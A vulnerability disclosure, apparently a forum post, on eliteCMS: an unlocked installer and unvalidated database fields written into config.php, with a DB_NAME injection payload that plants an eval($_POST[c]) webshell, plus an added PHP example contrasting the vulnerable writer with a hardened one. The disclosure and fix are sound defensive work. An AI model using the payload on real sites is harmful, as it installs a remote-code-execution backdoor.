eliteCMS: installer not locked after setup + one-line webshell written via the installer

Posted 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can simply request the installer URL and run the installation again.

The second issue is that the installer can write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...(omitted)...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written to /admin/includes/config.php.

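The following is an added example written for this page, not eliteCMS code and not from the post's author. It reduces the installer's config writer from the post to its essentials, feeds it the DB_NAME payload quoted above so the injected text is visible in the generated file, and puts a hardened writer beside it. The hardened version, the whitelist patterns, the var_export() serialisation, the install.lock file and the function names are all assumptions made for the example.

```php
<?php
// Added example, not eliteCMS code. Vulnerable config writer (shape taken from
// the post, trimmed) next to a hardened replacement plus an install lock.

// Vulnerable: values that came straight from $_POST via $_SESSION are
// interpolated into a double-quoted PHP source string and written to disk.
function build_config_unsafe(array $db): string
{
    $write  = "<?php\n";
    $write .= "define(\"DB_SERVER\", \"{$db['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$db['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$db['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$db['DB_PASS']}\");\n";
    $write .= "?>\n";
    return $write;
}

// Hardened (hypothetical):
//  1. host and DB identifiers must match a narrow charset (MySQL unquoted
//     identifiers are [0-9a-zA-Z$_]); length caps are conservative;
//  2. every value is emitted with var_export(), i.e. as a single-quoted PHP
//     literal with ' and \ escaped, so a value can never close the literal,
//     and "?>" inside a string literal is just text to the PHP lexer;
//  3. no trailing "?>", so nothing appended to the file is ever echoed.
function build_config_safe(array $db): string
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9_.:-]{1,255}$/',
        'DB_NAME'   => '/^[A-Za-z0-9_$]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_$]{1,32}$/',
    ];
    foreach ($rules as $key => $re) {
        if (!isset($db[$key]) || !is_string($db[$key]) || !preg_match($re, $db[$key])) {
            throw new InvalidArgumentException("rejected value for $key");
        }
    }
    if (!isset($db['DB_PASS']) || !is_string($db['DB_PASS'])) {
        throw new InvalidArgumentException('rejected value for DB_PASS');
    }
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($db[$key], true) . ");\n";
    }
    return $out;
}

// Re-install protection the post says is missing: every installer step must
// refuse to run once the lock file exists, and the last step creates it.
function installer_is_locked(string $lockFile): bool
{
    return file_exists($lockFile);
}

function finish_install(string $configFile, string $lockFile, array $db): void
{
    if (installer_is_locked($lockFile)) {
        http_response_code(403);
        exit('installer is locked');
    }
    file_put_contents($configFile, build_config_safe($db), LOCK_EX);
    file_put_contents($lockFile, "installed " . date('c') . "\n", LOCK_EX);
}

// Constructed input: the DB_NAME payload quoted in the post.
$payload = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'root',
    'DB_PASS'   => 'secret',
];

echo "--- unsafe writer, attacker-controlled DB_NAME ---\n";
echo build_config_unsafe($payload);
// The DB_NAME line in the generated file now reads
//   define("DB_NAME", ""?><?php eval($_POST[c]);?><?php");
// so the PHP block is closed and reopened around an eval() of POST data.

echo "--- hardened writer, same input ---\n";
try {
    build_config_safe($payload);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}

echo "--- hardened writer, same text as the password (no whitelist applies) ---\n";
echo build_config_safe([
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => 'elitecms',
    'DB_USER'   => 'elite',
    'DB_PASS'   => '"?><?php eval($_POST[c]);?><?php',
]);
// Emitted as  define('DB_PASS', '"?><?php eval($_POST[c]);?><?php');
// which is inert: the quotes in the value cannot terminate a single-quoted literal.

echo "--- install lock (written to a temp dir) ---\n";
$dir = sys_get_temp_dir() . '/elitecms-demo-' . getmypid();
mkdir($dir);
finish_install("$dir/config.php", "$dir/install.lock", ['DB_SERVER' => 'localhost',
    'DB_NAME' => 'elitecms', 'DB_USER' => 'elite', 'DB_PASS' => 'secret']);
echo installer_is_locked("$dir/install.lock") ? "locked\n" : "unlocked\n";
```

Run it with `php example.php`. Whether a given payload produces a file PHP will actually parse depends on what the writer appends after the interpolated value (here the remainder of the define() line follows the reopened `<?php`); the example only shows that attacker-controlled text reaches a .php file unescaped, which is the defect. The hardened writer does two independent things: it rejects anything that is not a plausible host or identifier, and it serialises every value so that even a field with no sensible whitelist (the password) cannot break out of its literal. The lock is only useful if the check runs at the top of every installer request, not just the final step.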

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表